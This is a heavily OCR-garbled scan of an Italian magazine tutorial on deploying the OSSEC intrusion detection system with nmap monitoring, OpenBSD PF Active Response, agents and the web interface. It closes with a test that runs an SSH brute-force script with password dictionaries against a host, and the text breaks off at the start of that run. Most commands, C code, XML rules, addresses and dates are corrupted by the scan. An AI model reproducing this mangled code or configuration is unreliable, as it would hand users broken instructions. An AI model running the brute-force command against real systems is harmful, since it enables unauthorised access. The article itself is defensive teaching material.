(evidenziato). 

Viene quindi successivamente 
riportato lo spezzone di errar log 
del web server incriminato, utile per 
identificare all'istante orari ed IP di 
provenienza dell'attacco. Senz'altro 
utile, no ? 



REBD LE AD H □ □ 

Ora che abbiamo capito come 
funziona l'architettura dell'applica- 
tivo e su che schemi poggia il suo 
funzionamento possiamo lanciarci 
finalmente nella parte più creativa 
dell'articolo: la scrittura di regole 
personalizzate. 

In questa sede vedremo, a tìtolo 
esclusivamente esemplificativo, 
come sia possibile scrivere una 
specifica regola ohe Ci consenta 
di monitorare costantemente le 
porte aperte su un determinato host 
(intemo o esterno alia rete) utilizzan- 
do il comodo e semplice nmap ed 
irrterfacciandoìo con l'HIDS. 
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L'applicativo infatti è in grado di 
leggere senza alcun problema i log 
in formato grepabSe (da nmap: "-oG 
nomefì'le") di nmap come qualunque 
altro log di Sistema. 

Gli alert saranno quindi generali nel 
formato standard OSSEC ed inviati 
periodicamente via posta elettroni- 
ca ogni qualvolta subentrino nuove 
informazioni interessanti (porte 
aperte ma precedentemente chiuse 
o viceversa), 

Per i più pigri, ricordiamo che tutti i 
file XML di seguito analizzati sono 
disponibili online al sito www. ha- 
Ckerjourrial.it. 



SCANSIONE HDBT 

Per la scansione dell'host (in questo 
caso interno alla rete e precisa- 
mente 132.168.1.100) opteremo per 
l'analisi delle porte UDP e TCP vìa 
connecto utilizzando l'interfaccia di 
rete interna del firewall [nel nostro 
caso "emQ") ed esportando il risul- 
tato sii ull file di testo {"ivar/logf 
nmap.log") che sarà poi analizzato 
da OSSEC: 

nmap --óptiena_sutput -sT -aU- 
-e eraO -oG /var/ lcg/nTiiap. log 
iSJ.lSe.l.lOC 

Testiamo in prima battuta il fun- 
zionamento di nmap, ottenendo il 
consueto report: 



i:3/tcp open auth 
500/udp open|filtered isakiop 

MAC Address: 40 :61 ;+*:**:** :1D 

iUn'snown) 

Aggiungiamo quindi una riga alla 
crontab del sistema che si occupi di 
avviare nmap ogni 30 minuti: 



sudo crontab 



"3 3 * * * * nmap --appendjautput 
-ST -su -s emC -oG /var/ log/ ■ 
fifnap-lfflf 192,168.1 . 100 

Segnaliamo ora ad OSSEC il per- 
corso relativo al fiie generato 
specificando nel tag "log format" 
la stringa nmapg; ciò farà intendere 
all'HIDS che si tratta di output in 
formato grepaoie di nmap: 

<; loca Itile :> 

slcg_£ crrnat>nTnapg^/log_- 

iaàts 

elocaticns/var/log/nnap , 
lcg</locaticn= 
^/localfiles 

Dopo un necessario riawio di 
OSSEC, una rapida occhiata agii 
alert ci conferma immediatamente la 
riuscita dell'opera: 

3 ;ail -f /var/osaec/logs/alerts.' 
alerts.log 

** Alert 1268013722,7319: mail - 
ossee, hostinfo, 

2010 Mar 08 03:02:02 tww-s/var/ 
log/naap . log 

Rule: 581 (ievel 5) -» 'Host in- 
forcatici! added.' 
Src IP: [nere) 
Usar; (none; 

Host: 193.168,1.100 ([, open 
parts: 135 (topi . . . 

Se invece siamo restii alla shell, una 
mail inviata dal sistema ci notifi- 
cherà immediatamente le stesse 
informazioni: 

OSSEC KIDS Notificatici!, 
2018 Mar GB 03:02:02 

Keceived Fresi: wMti->/var/log/ 
r.inap . log 

Rdle: BB1 iired (leirei 8) -> "KOSt 
inforcatisi: edded." 
Porti-on of the logis] : 

Hos;: 192. 168. i. 100 (), open 
por;s: 135 (tep) ,.. 

Vediamo invece cosa accade nel 



momento in cui, sempre sull'host 
considerato, viene aperta un'ul- 
teriore perla rispetto a quelle 
identificate dal primo alert. 

Proviamo, banalmente, ad aprire 
la porta 50000 con i n semplice 
script: 

S cat bind.c 

^include <:ays/socket..ri> 

tfinolude sne . inst / io . h> 

int maini ! { 

int s. e, 

atruct sos^addr_in 
addr r c_addr; 

int c_len - BÌzeofic_' 

addr) j 

3_aeÈdr,3ÌK_faoiily = JB?_i 

IHET; 

£ addr.EÌn_p3rt - 
htOrie(5QCQC) ; 

6_addr , sin_addr . e_addr = i 
IHA3CKJOJY; 

5 a socke; lii.lJ.WT, ■■ 
SOCK._STRBAM, 0) ; 

bind {s, (struct- 
aockaddr*! &s_addr, sizeo: È'èj* 
addr) i ; 

listanis, 1> ; 
acceptis, istruct n 
sockad^-*! 1 &e addr, ir len] : 

T 

8 gec bind.c -o bind 
$ . /birri 

Puntuale come un orologio svizze- 
ro, scattata la mezzora del croni oh 
definito prima, un apposito alert ci 
informerà sia da shell che via posta 
elettronica circa il cambiamento 
avvenuto rispetto alle porte inizial- 
mente aperte sud' host 

# tali -f /var/ossec/logs/alerts/ 



** Alert I26B017859.7693: mail - 
ossee ,hcst info, 

2010 Mar 08 04:10:59 www->/var/ 
l&g/naap. log 

Rule: 555 {leve! Sì •> 'Host, in- 




iorrciation changed. ' 
Src IP: (none) 
Userr (none} 

HCSt: :3I.16B.1.IDC ■',} , apen 
pnrts: 3,35 (tcpi ... 50(00 ftcp) 

Per finire, vediamo come sono de- 
finite le regole 530 è 581 oggetto di 
questi alari: 

«mie i,<3=?5BC* ìevel='8"> 

«eategorysoasec:/ 
categojry> 

■; dscoded_a9?hos ; : ufo 
modifÌ£cU/deco:ied_aa> 

<dÉSCffip6iisiiao»S infoi; 
natica charjged.c/àescription? 

gro-ap sÈortiSf a r < /g?™p > 

c/rul&i 

srule ida'ESl" level«"6"> 

categwys 

dec-otìe d_as >hos t inf c_ 
new<q/deccded_as> 

<aescripti3r.sHonL 
Information aàdfid ; .<c/de£crip£ion> 

<grouj»hostiTifo, </jro'at> 

Il lettore, a questo punto, dovrebbe 
essere autonomamente in grado di 
interpretare il significato di queste 
due semplici regole. 

Risulta quasi lapalissiano dire che 
l'unico freno imposto nella realizza- 
zione di regole ad hoc è la nostra 
fantasia; come abbiamo avuto modo 
di vedere, OSSEO è un applicativo 
di comprovate possibilità e risulta 
facilmente modellabile. 

Il lettore avrà sicuramente percepito 
i margini di applicazione deli' Hi DS 
e la totale capacita di adattamento 
a contesti di qualsiasi dimensione e 
natura. 



La documentazione offerta online 
inoltre è notevole; possiamo trovare 
spunti ed approfondimenti per qual- 
siasi evenienza con una semplice 
ricerca. 



CONCI LUS !□ NI 

No, non ci siamo dimenticati di illustra- 
re i passi necessari al setup del server 
e dei vari agenti. 

Semplicemente, in questa prima parte 
dell'articolo, abbiamo preferire offrire 
una trattazione ampia tesa soprattutto 
all'introduzione dell'HIDS ed al suo 
funzionamento nel dettaglio. 

Assodato ciò, risulterà sicuramente 
più facile ed immediato perii lettore 
comprendere come operativamente 
costruire lo scenario definito in questa 
sede nel corso del prossimo numero 
della rivista. 

Per i più impazienti, come sempre, 
segnaliamo il forum ed il canale IRC 
della rivista (irc.azzunra.org - #ha- 
cterjcomal). Entrambi costituiscono il 
miglior posto dove deh iedere maggiori 
informazioni e trovar risposta alle 
proprie domande confrontandosi con 
gli autori e la community. 

Concludiamo quindi la prima parte 
della nostra trattazione offrendo alcuni 
opportuni riferimenti citati ed utilizzati 
anche durante la scrittura di quest'ulti- 
ma (yedi bcwj. 

BOX #2: RIFERIMENTI I PARTE 

Website relativi agli applicativi ed i 
sistemi operatavi analizzati! 

Trend Micro™ OSSEO: ivww.ossee.nef 
OpenBSD: wwvKcpenf)sc/.ofp 
Nmap: www.nmap.org 
Apache httpd: httpdapactie.org 
OpenSSH: www.openssh.com 

Alcune riferimenti online utili: 

OSSEG Manuel; i*wwossK,mf/main/ma- 

Regexp: en.wikiped&.wgtvMfRegular_ex- 
pmssson 

BeeTs guide to Network Programmino.: beej, 
us/guidefbgnetl 

Mar» officiai project guide te Network 
Dfecovery and Security Scanning: nmap.org/ 



Extensfele Markup Language (XML): m™ 

IDS and IPS pfrcement for Network Protec- 
fiorì (by R Dram, ISC CISSP): fmy.ee/GJefrr 
OpenBSD 4.6 fnsÉatfatton Guide; www,openb- 
sd.orgHaqHsq4.Minl 

Ulteriori riferimenti: 

OSSEC Host-Based Intrusion Detection 
Guide by A. Hay, D. Cid, R. Bray (editore 
S^lO/ess): frly.ee/DFainX 
Hacker Journal nr 138- "Protezione totale" 
Hackar Journal nr. 1 94 - "Probing & Perretra- 
tton tesfing" 

Hacker Journal nr, 197 -"Introduzione ad 
OpenBSD" 



PROSSIMAMENTE 

Esauriti i necessari richiami teorici af- 
frontati durante fi corso dell'articolo, 
vedremo come si configura il vero e 
proprio processo di difesa autonomo 
accennato nel medesimo.! 
Focalizzeremo pertanto la nostra 
attenzione sulla modalità "Active re- 
sponso" dell'applicativo, spostando 
i margini di applicazione dello stesso 
da Intrusion Detection System (IDS] 
ad Intrusion Prevention System (IPS). 
in quest'ottica risulterà obbligatorio 
rispolverare alcune nozioni già intro- 
dotte nel corso dei numeri passati 
della rivista relative a PF, vedendo 
come integrarlo al meccanismo A.R, 
di OSSEC, 

Sarà inoltre messa sotto ì riflettori 
anche la comoda interfaccia web 
dell'applicativo e l'integrazione del 
meccanismo di alerting a database 
MySQL sicuramente un modo molto 
piO comodo di accedere alle infor- 
mazioni di nostro interesse rispetto 
quanto visto finora. 

Concludendo, testeremo quanto rea- 
lizzato in entrambe le parti attraverso 
la programmazione di attacchi mirati 
ai singoli host della rete utilizzando 
prevalentemente software Open 
Source. 
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L 'Conclusa la necessaria trat- 
tazione teorica nel corso del 
precedente numero della rivista, 
in questa sede vedremo come 
tendere definitivamente operati- 
va la soluzione prospettata. 
Prima di iniziare stendiamo una rapida 
roadmap di quel che andremo a fare di 
seguito. 

In prima battuta com'è facile intuire, Ci 
preoccuperemo di installare OSSEC sul 
server [che ricordiamo essere OpenBSD 
4.6) configurandolo fedelmente n spetto 
a quanto detto nella precedente puntata. 
Sarà inoltre comodo installare l'inter- 
faccia web (ossec-wui) direttamente in 
questo passaggio, rendendola immedia- 
tamente funzionate. 
Vedremo quindi come abilitare effetti- 
vamente i processi di difesa autonomi 
attraverso la modalità "Active Response" 
del l'HI DS e come configurare la stessa 
con il firewall di sistema (PF). Passeremo 
quindi all'installazione dei vari agenti sugli 
host della nostra rete. 
Infine, testeremo il lavoro svolto pianifi- 
cando alcuni attacchi generici diretti sìa 
al server che ai vari host. 



INSTALLAZIONE DEL 
SERVER 

Nel numero 1 97 della rivista abbiamo 
avuto modo dì analizzare rinstallazbne 
di OpenBSD 4.6. Partiremo pertanto 
da quella nel seguito di questo articolo, 
integrando le opportune modifiche da 
apportare al sistema 

Al momento della scrittura dì questo 
articolo, l'ultima versione di OSSEC 
disponibile per il download è la 2,3 repe- 
ribile all'indirizzo www.ossec.nefmain/ 
download»/, 



T 



Logghiamoci pertanto come root al ser- 
ver OpenBSD, scarichiamo e decompn- 
miamo l'archivio di nostro interesse nella 
directory di root di Apache {/vartwmi, 'i 
motivo di questa scelta sarà chiaro quan- 
do affronteremo l'installazione dell'inter- 
faccia Web dell'applicativo): 

# ed /var/wmf/ 

ti wget http: //"www. 055eg.net/ - 
files/ossee-hias-2 . 3 .tar.ga 

# tal zxrf ossec-hids-2.3.tat< 



Avviamo quindi il processo di installazio- 
ne, che commenteremo di seguito in ogni 
singolo punto: 

# ed sssec-hid3-2.3/ 

# . /instali. sh 

Verrà prima di tutto richiesta la lingua da 
utilizzare per l'installazione; digitiamo T 
e diamo Invio. 

Le script dì installazione [di seguito 
SDÌ) si occuperà dì fornire un riepilogo 
del sistema, chiedendoci conferma per 
continuare. Diamo semplicemente Invio 
per procedere. 

Da Questo punto in poi partiranno una 
serie dì domande da parte dello SDÌ 
volte a definire la tipologia di installazio- 
ne richiesta, eventuali parametri relativi 
alla nostra macchina e te directory dove 
finalizzare il setup. Malgrado questa fase 
si spieghi da sola, commenteremo anche 
quii sìngoli passaggi: 

Definiamo innanzitutto la tipologia di in- 
stallazione tra quelle proposte. Scriviamo 
pertanto "server" e diamo Ih». 
Indichiamo il percorso di installazione 
dell'HIDS. Scriviamo L Vvar/www/ossec". 





J 




Abilitiamo la notifica degli alert via mail 
rispondendo "s". 

Inseriamo il nostro indirizzo di posta 
elettronica 

Lo SDA individuerà autonomamente il 
server SMTP relativo alla mail inserita, 
confermiamo l'utilizzo dei medesimo 
scrivendo "s". 

Abilitiamo il controllo di integrità dei filo 
(Syscheck) digitando "s". 
Stesso discorso per il riconoscimento dei 
roottót (Rootcheok). 
Attiviamo la risposta attiva festive Re- 
spinse) rispondendo atfermalivamente 
all'apposita richiesta ed a quella succes- 
siva relativa alfe risposte firewall-drop. 
Definiamo eventuali IP (esclusi I DNS 
primari e secondari, già Inclusi) da 
escludere dai controlli. Mei nostro caso, 
volendo monitorare anche i comporta- 
menti intemi alla rete, abbiamo risposto 
negativamente. 

Disabilitiamo il Syslog remoto risponden- 
do "n". 

Il processo di configurazione pre-instalia- 
ztoneèoraconcluso. 

Immediatamente l'HIDS offre un riepilogo 
dei fife che saranno oggetto di analisi 
sulla macchina entro quale è installato. 
Il processo è totalmerrte automatizzato 
e lo SDA individua del tutto autonoma- 
mente i file dì log di base del sistema, nel 
nostro caso OpenBSO: 

3.6- imposta la configurazio- 
ne per l'analisi dei seguenti 
log>i 

— /var/logVinessages 

— /vtr/los/a»thlog 

— /VMVlOÉf/secure 

— /vax/log/xf earìog 
-- /vtn/log/BBilltjg 

/var/WKW/logs/acceES log i 
(apache log) 

— /var/www/logs/arror log i 
(apache log) 

Diamo Invio per dare il via all'effettiva 
compilazione dei sorgenti dell'applica- 
th/o. 

Il processo si esaurirà nel giro di qualche 
minuto. 

Se tutto e andato per il verso giusto 
l'output risultante dello SDA dovrebbe 
essere il seguente: 



<...> 

- Configurazione terminata cor- 
rettamente, 

- Per avviare OS SEC 
HXES: /var/www/ossec/bin/ " 
ossec-control start 

- Far arrestare 03- 

SBC HIDSi/var/www/essee/bin/ -i 
ossac-control £tQP 

- 1^1 configurazione può essere 
vista o modificata in /var/ ~> 
iflw/ossec/etc /ossee- ccmf 
Grazie per aver scelto OSSEC 
arijs. 

<. . .> 

Concludiamo infine l'installazione dell'ap- 
plicativo impostando l'avvio dello stesso 
insieme al sistema operativo, inserendo 
nel file "/etoYcJoca!" ia seguente diret- 
tivar 

sebo "Avvio OSSEC HIDfi" 
/var/www/ossecVbiii/ossec - -i 
control start 



RISPOSTA ATTIVA 
E E □ N F) G U RAZI □ N E 
Di PF 

Installato OSSEC Ci preoccuperemo ri 
configurare correttamente PF, integran- 
dolo all'HIDS al fine di rendere operativa 
la modalità Active Responso deil'applì- 
cativo. 

Nel numero 168 della rivista abbiamo 
avuto modo di affrontane abbastanza 
dettagliatamente l'utilizzo e fa configu- 
razione del packetfBter dì Open BSD per 
utilizzi generici. In questa sede, partendo 
da quella base, aggiungeremo un'ulterio- 
re necessaria nozione che ci consentirà 
di capire come funziona l'interfacciamen- 
to tra l'HIDS ed OpenBSD. 

Per gestire più istanze singole accor- 
pandole ad un'unica azione, PF offre un 
meccanismo tabellare semplice e per- 
formante. Definendo apposite tabelle di 
indirizzi identificate da un nome univoco, 
è infatti possibile associane particolari 
azioni al blocco di indirizzi identificato 
dalie stesse. 

OSSEC stutta proprio questa caratte- 



ristica. Inserendo un 'opportuna tabella 
denominata "ossec_fwtaple" all'intorno 
del file di configurazione del firewall l'ap- 
plicativo si occuperà di riempirla secondo 
le necessità del caso, andando di volta in 
volta ad inserire quei singoli IP identificati 
quali mittenti degli alert generati e dei 
tentativi di attacco ricevuti. 

PF, matchando semplicemente la tabella, 
imposterà un blocco in uscita ed in entra- 
ta Su tutto il gruppo di IP definita. 

vediamo quindi come istruire il firewall in 
tal senso. Editiamo la configurazione del- 
lo stesso, inserendo nel fife Vetc/pf.conf' 
le seguenti tra righe: 

# ossee 



table <ossec_fwtable> persist 

block in quirfs £rom tossec 

fwtable> to sny 

block out quiete front any to -■ 

<oasec_fwtable> 

# — - 



Non importa la collocazione dì questo 
blocco di istruzioni. Questo perette, 
come abbiamo avuto modo di scoprire 
ilio tempore, l'utilizzo della direttiva quick 
impone l'esecuzione dell'azione definita 
indipendentemente dall'ordine che que- 
sta assume rispetto alle altre. 

Da questo momento l'HIDS si integrerà 
perfettamente al firewall del sistema. 
I meccanismi di protezione autonoma 
Offerti faranno si che l'applicativo, d'ora 
in poi, si configuri esattamente come 
HIPS (Host-based Intruston Preventìon 
System). 

La modalità Actìve Response di OSSEC 
non si esaurisce al solo inserimento degli 
IP originari degli attacchi nella tabella 
appena definita. Essa, di default, per un 
periodo di tempo determinato in fase di 
scrittura delle regote dell'HIPS, collo- 
cherà i medesimi IP nel file "hosts/Jeny" 
del sistema, su OpenBSD come per 
ia stragrande maggioranza dei sfetemi 
Unix-like, collocato nella directory "etc". 

AGENTI 
Come abbiamo esaurientemente Spiega- 



to nel corso del numera passato, OSSEC 
colleziona le Informazioni ed i log degli 
host della nostra rete attraverso i vari 
agenti in stillati sulle singole macchine. 

Per funzionare, un agente invia la propria 
chiave di autenticazione al Server che lo 
identifica univocamente. 
H tool et» si occupa della gestione degli 
agenti è "manage_agents", collocato 
nella directory "/var/www/ossec/birV''. 

Vediamo di seguito il procedimento 
per l'inserimento di un singolo agente; 
questo, ovviamente, risulterà invariato 
perogni ulteriore installazione. In prima, 
istanza, una volta avviate- il tool, digitiamo 
"A" per aggiungere un nuovo dient 

-S /vif /™w/c-5sec/j5Ìn/inanage_ 
ag&fits 

(AJdd sa agnat {JV), 
(E)xti-act key tot an -• 

aaent :e) . 

(L}ist alrsady added i _ 
agente (L) , 

[RJemove igsnc in}. 

(fiiiiit. 

Chooso your action; A f E f L,R or 
Q: A 

Saranno quindi richiesti i dettagli relativi 
al nuovo agente (nome, indirizzo IP ed un 
ID numerico}. 

Rispondiamo in base alle nostre esigenze 
come di seguito: 

* A nome for the new agi&at: 
EC-TfìdiSwSl 

* The IP RfMress of Un n 
new agent: 192,168.1.100 

t iti ID for tlue new agent -i 
[001]; 001 

Cemfim adding itT(y/n>: y 

Il tool ritornerà quindi all'interfaccia ini- 
ziale. Stavolta digitiamo "E" per generare 
la chiave di autenticazione per l'agente 
appena creato. Anche in questo caso il 
pnxsdimento è guidato: 

Choc-se your action: A,£ t L,R. ■< 
tìr v Qj E 

Arailable agents: 



IH: 001, Hame: PC-- 
Windowsl, IP; 192,163, 1.100 
previde the ID ci the agent ri 
to extraet (° r % \<l' ~> 

tt> Hjuit) i 001 

Agent key inf oxinatioil -» 
£or l 001' is: 



Windows Agent" impostando il Tipo di 
Avvio su "Automàtico''. 



La chiave appena generata sarà quella di 
vetta in volta richiesta in fase di installa- 
zione dell'agente sui vari host della rete. 
Per ogni nuovo cleri ne genereremo una 
ad hoc. 



WINDOWS AGENTE 

Per Microsoft Windows l'eseguibile da 
scaricare ed installare lo troviamo all'indi- 
rizzo www.ossec.nevtiles/ossec-agerrt- 
wir32-2,3.oxc. 

In fase di jistalìazione abilitiamo J'intjsgri- 
ty checkirtg e disabilitiamo il monitoring 
dei log di 11$ (fatti salvi i casi in cui vi sia 
effettiva necessità, ad esempio nell'ipote- 
si in cui il nostro host Windows fosse un 
ulteriore od il singolo server web). 
Conclusa l'installazione in classico ed 
inconfondibile stile Microsoft (Avanti, 
Avanti, Fine) si presenterà di fronte ai 
nostri occhi l'Agerrt Manager, In questa 
schermata dovremo inserire l'indirizzo IP 
del server OSSEC e l'Auto Key. 



L'QSSEC Agent Manager su Microsoft 
Windows in fase di abilitatone deffVrosf 
come Agente dell WPS, 
La pressione del tasto Save ed un click 
su Manage -> Start OSSEC è più che 
sufficiente per far si che l'agente assuma 
vita autonoma. 

Per abilrtare l'agente direttamente all'av- 
vio del sistema modifichiamo attraverso 
services.mse il servizio "OSSEC Hids 




Abilitiamo f'avwo automatico doli' Agente 
modificando l'apposito valore. 



A questo punto la postazione Windows 
appena configurata farà parte della reto 
OSSEC. 

Per testare l'effettiva operatività 
dell'agente, dal server digitiamo: 

ti /var/wmj/ossec/bìii/ageot_ - 1 

control -le 

OtìSEC HIDS agcnt_contEol . - 
Lise of avallatila agente: 

ID: 000, nane: www. -> 
gettane. info dorvoc}, IP: -■ 
127,0.0.1, Active/Local 

ID: 001, Haute: PC-Wiadowsl, 
IP: 192.168.1.100, àetìva 



UNIX AGENTS 

li procedimento di seguito illustrato 
riguarderà l'installazione dell'agente su 
host Linux, BSD, Solaris e Mac. 
La distro utiizzata in quesf esempio è 
Gentoo. Resta intoso che questo det- 
taglio è di scarso interesse in quanto il 
processo qui descritto sarà lo stesso per 
qualsiasi distribuzione. 

Il pacchetto da scaricare sarà quello 
usato in fase di installazione del server. 
Semplicemente, appena richiesto, defini- 
remo come "agent" il tipo di installazione 
desiderata: 



[rootEPpluto -]#nipse http:// 
- MMM.oegee.net/files/ossec- 
hi<Ì3-2,3.tB3:.9z 
[rootSpluto -]# tar zjcvf 
□&sec-liids-2,.3*tar.g2 
[root^pluto *]# ed ossec- 
hids-2.5/ 

[root^cluto ossec-hids-2.3]# 
. /instali. sh 



■er selezioniamo 
per l'installazione e 



Come fatto per il server setezior 
l'italiano come lingua per l'instai 
procediamo. 

Commenteremo di seguito ogni 
passaggio dell'instai Iasione: 



Digitiamo "agent" alla richiesta del tipo di 
installazione da effettuare. 
Stavolta definiamo "Arar/ossee" la direc- 
tory entro cui installane l'agente. 
Inseriamo l'indirizzo IP da) server OSSEC 
(rtìt nostro caso 1 92.168.1 .10), 
Attiviamo syscheck, rootcheck ed 
Active Response digitando °s" a tutte le 
richieste. 

Diamo invio per concludere la configura- 
zione e dare inizio aria compilazione. 

Dopa qualche istante, a compilazione 
completata, dovremmo ricevere in output 
le seguenti informazioni relative ail'ìnstal- 
lazione appena effettuata: 



- conftaucaisioiie terminata cor- 
rettamente. 

- Per avviare OSSEC HIDS; fvar~ 
/osssc/bin/ossec-control start 

- Per arrestare OSSEC HIDS: -i 
(vàt/ dssse/bìn/ ossee- control 
stop 

- La configurazione può essere 
vista o HBdificata in /var/ - 
ossee/ete/ossec .coni 

Grazie per aver scelto OSSEC 
BUS. 



Impostiamo quindi l'avvio dell'agente al 
boot inserendo '7var/ossec/ton/ossec- 
control start" nell'apposito file di init della 
nostra distribuzione. 

Installato l'agente sull'host generiamo, 
come visto prima, un'ulteriore chiane di 
autenticazione per il Client appena con- 
figuralo. Fatto questo, abilitiamo Trust 



utilizzando anche sull'agente "msna- 
ge agents": 



■2,3]#/var/QSBec/ 



bin/manage.agents 



Choose your action: : crQ: I 

Paste ìt Lene Cor ' \q' to -> 
(luit): MtM^TFBDLnxribllV4MSJlX. . . 

confi™ adding it? (y/u) : y 
Added, 

Avviamo pertanto il Client: 
Irootfiiluto osgec-hi.ds-3 



Staiting OSSEC HIDS v2.3 
(by Trend Micro Ine . } . . . 
Stareed ossee -exeed... 
Starteli ossee -agentd. . . 
Start ed ossec-logcollector, , , 
Start ad ossee-Eyseheekd. , , 
Compi Gt od. 

□al servertestiamo, infine, ['operatività 
dell'agente: 



# /var/ww/ossec/bia/acreat_ -■ 
control -le 

OSSEC HIDS agent control. -, 
List of available agents: 

IDi ODO, Marna: www.gfhamù. 
info {server) r IP: 127.0,0,1, ~ 
ActiveV Locai 

IDf CUI, Marne: PC-Wicdowsl , - 
IP: 132. 16S. 1.100, Active 

ID: 002, Nane: ?c-Linuxl, -i 
IP: 192. 168. 1.132, flctive 

Ripetendo sia il procedimento illustrato 
qui che quello per Agenti Windows, 
metteremo via via tutti i nostri host sotto 
l'occhio vigile di OSSEO. 

□ SSEG WUI 

Leggere gii alert via posta elettronica e 
via terminale farà sicuramente moito nere! 
ma nel caso di reti complesse e carat- 
terizzate dalla presenza di innumerevoli 



host non è decisamente la scelta più 
comoda. 

Avere l'opportunità dì utilizzare un 'inter- 
faccia che riassuma lo stato del network 
Ci risparmierà indubbiamente molto 
tempo, consentendoci, peraltro, di avere 
un quadro d'insieme delia situazione ag- 
giornato in tempo reale e visibile in ogni 
parte del globo. 

Seguendo quindi la roadmap prefissata, 
occupiamoci di installare il frontend web 
di OSSEC sfruttando Apache. 

I più attenti ai ricorderanno che OpenB- 
3D gestisce Apache in un ambiente 
totalmente isoiato dal resto del sistema 
(chroot}. Dà qui, piuttosto che Utilizzare 
un numero considerevole di link simbo- 
lici, abbiamo preferito installare OSSEC 
direttamente nella root del server Web (/ 
varAvwW). 

Questo ci permetterà di rendere l'instal- 
lazione delia wui molto più snella, non 
dovendoci preoccupare dell'impossibilrlà 
da parte di Apache di accedere a directo- 
ry esteme al suo environment di lavoro, 

Scarichiamo quindi il tartan dell'interfac- 
cia Web (ai momento della scrittura di 
questo articolo giunta alla versione 0.3) 
ed installiamola sul Server: 



# ed /var/www/htdecs/ 

ti wget htCp;//™w.OÈBBc.nst/fi i 
les Aii/osflec-wui-0 . 3 .tar. gì 

# tar ekv£ osEec-wui-0.3.fear.erz 



Avviamo to script di setup per impostare 
l'autenticazione richiesta quando acce- 
diamo alle pagine della WUI: 

# ed ossec-wii-0.3 

# ./setup. ah 
Setting up ossee iL . , , 
username: giovanni 
New password: 
Ee-type new password: 
Adding password £o~ ueer - 1 
giovarmi 

Seti)» corapleted auccessfuly. 

Modifichiamo ora il file di configurazione 
[ossec_,conf.phpj, indicando il percorso 
di OSSEC ohe nel nostro caso sarà, pro- 
prio per le constatazioni relative all'am- 




Diente ehroot Me prima, Vossec", 
Viste le nostre necessità la restante parte 
deSa configurazione è più che sufficiente: 
la lasceremo pertanto invariata. In defi- 
nitiva il file dovrà ris ultore cosi: 

$ossbc dir»" /ossee"; 
$os3ec_max_alerts_per page " 
= 100 Di 

$ossec_eearch_level ■ 7; 
$3ssec_seart!h_tiiiie " 144G0; 
$oss«sc re££esh_tinie = &0, 

Un rapido collegamento con un qualun- 
que browser al server web (nel nostro 
caso 1 92.1 68.1 .1 0) all'indirizzo http://-/ 
ossec-wui-0.3/index.php ci confermerà 
immediatamente la riuscita dell'instal- 
lazione. 





_ ... w 













La modifica di questi ultimi, volontaria 
o mono ohe sia (si pensi ad esempio 
per Windows all'operato di trojan, virus, 
etc. e per Linux a backdoor, exploit et 
similia), determinerà necessariamente 
la gena-azione di un hash diverso, evi- 
denziando l'avvenuto cambiamento. 

È proprio su questo elementare pre- 
supposto che si basa il controllo di 
integrità (integrity checkìng) condotto 
daOSSEC. 

Nell'esempio proposto in figura, rela- 
tivo alla scheda "Integrity checking" 
della WUi, possiamo appunto osser- 
vane il checksum latto al primo avvio 
dall'agente ospitato sul PC montante 
Microsoft Windows. 

A sinistra è indicato il file monitorato, al 
centro è possibile visualizzare la coppia 
di hash associata allo stesso ed a de- 
stra la dimensione. 



Le statist/cf» degli afert generati rappre- 
sentano un ottimo strumento offerto al 
net admin per mgrtrtarare costantemente 
fa ssÉuazrane generate dell'intera rete. 

Infine, nella scheda "Searcti", è possibile 
ricercare sìngoli eventi ed alert generati, 
Nell'esempio proposto in figura abbiamo 
focalissalo la nostra attenzione SU SSH. 



L'homepage della WUI ci mostra un rie- 
pilogo degli ultimi eventi e log analizzati 
e dei file modificati {integrity check). 

La struttura della WUI è piuttosto sem- 
plice- Essa si avvale di un'interfaccia 
suddivisa in 5 schede: Main, Search, 
Integrity checking, Stats, About. 
Escludendo l'ultima, ognuna di queste 
offre preziose informazioni relative ai 
dati raccolti da OSSEC e dai vari agenti 
nella nostra rete. 

Nella home è proposto un quadro d'in- 
sieme dove sono visualizzati gli ultimi 
alert, la lista degli agenti attivi disponi- 
bili egli ultimi file modificati (integrity 
check). 

Su quest'ultimo punto spenderemo 
qualche parola. Durante il processo di 
installazione degli agenti e del server 
stesso, i file "caldi" del sistema sono 
tutti finitati digitalmente dall'applicati- 
vo. In sostanza è generata una coppia 
di hash (SHA1 ed MD5) associata ai 
singoli file predetti che li identifica in 
modo univoco insieme al loro conte- 
nuto. 




Il controllo di integrità dei die analizzati 
dall'agente montato su Windows. 

In caso di modifica degli stessi, natural- 
mente, sarà generato un apposito alert 
informativo. Anche se la probabilità di 
falsi positivi in questo contesto è molto 
alta, è sempre auspicabile prestare par- 
ticolare attenzione a questo genere di 
alert in quanto potrebbe rappresentare, 
con buona approssimazione, un primo 
campanello di allarme circa la compro- 
missione del nostro host da parte di 
malware generico. 

La scheda "Stats" ci offre ^ una singola 
schermatale statìstiche degli alert 
generati dall'HIPS suddivise per livelli, 
regole ed orari. Rappresenta pertanto, 
indubbiamente, un ottimo strumento per 
avere una visione d'insieme della situa- 
zione del nostro network in tempo reale. 



La funàonatìtà di ricerca consente di 
wsua/izzane unicamente gli alert di nostro 
interesse. 



3 2 1 
CIAK, AZIONE! 

Dopo questo excursus tra configurazio- 
ni ed installazioni è giunto il momento 
di testa» sul campo l'affidabilità della 
soluzione OSSEO. Fedelmente a quanto 
analizzato nel corso dell'intero articolo 
effettueremo alcuni attacchi contemplati 
dalle regole arcaizzate. 

Oggetto di nostro interesse in questa 
sede saranno pertanto i riscontri ai 
seguenti: 

Tentativi di accesso non autorizzati [di 




seguito TANA) su 
Scanning effettua 
vvébapps. 
Segfault diapplic 
Controlli di integri 




a website e 



Windows. 



dows. 



— ; -....succitati anslig»- 
remo il comportamento di OSSEO con- 
statando anche come l'operato di Active 
Response stronchi sul nascere qualsiasi 
tentata di attacco ai sistemi, coordinan- 
dosi in modo perfettamente autonomo 
conPFedOnenBSD. 



1 - TANA SU 
PROTOCOLLO SSH 

Per testare il comportamento di OSSEC 
in caso dì attacchi brute forse al proto- 
collo SSH utilizzeremo uno dei tantissimi 
script disponibili onfme: mtsshbnitapy 
che trovate disponibile per il download 
sul nostro sito. 



Lo script, scritto in python, consente di 
inoltrane multiple richieste di accesso 
in base ad utenti e password definite in. 
appositi file die fungono da dizionario. 
Supportando il threading indire ci con- 
sente di velocizzare di molto l'operato. 

Avviamo pertanto lo script come di 



$ aython mteSnbruta.jjy -H m(He. 

it -p 22 -WuBers.txt -P 

dizionario, txt -T 2 

[*] ISSH Brute Force Ninja 

[*] 1 user(s) loaded. 

t*j 10 passwjra(s) loadsd. 

[-*■■] Erute Force started. 

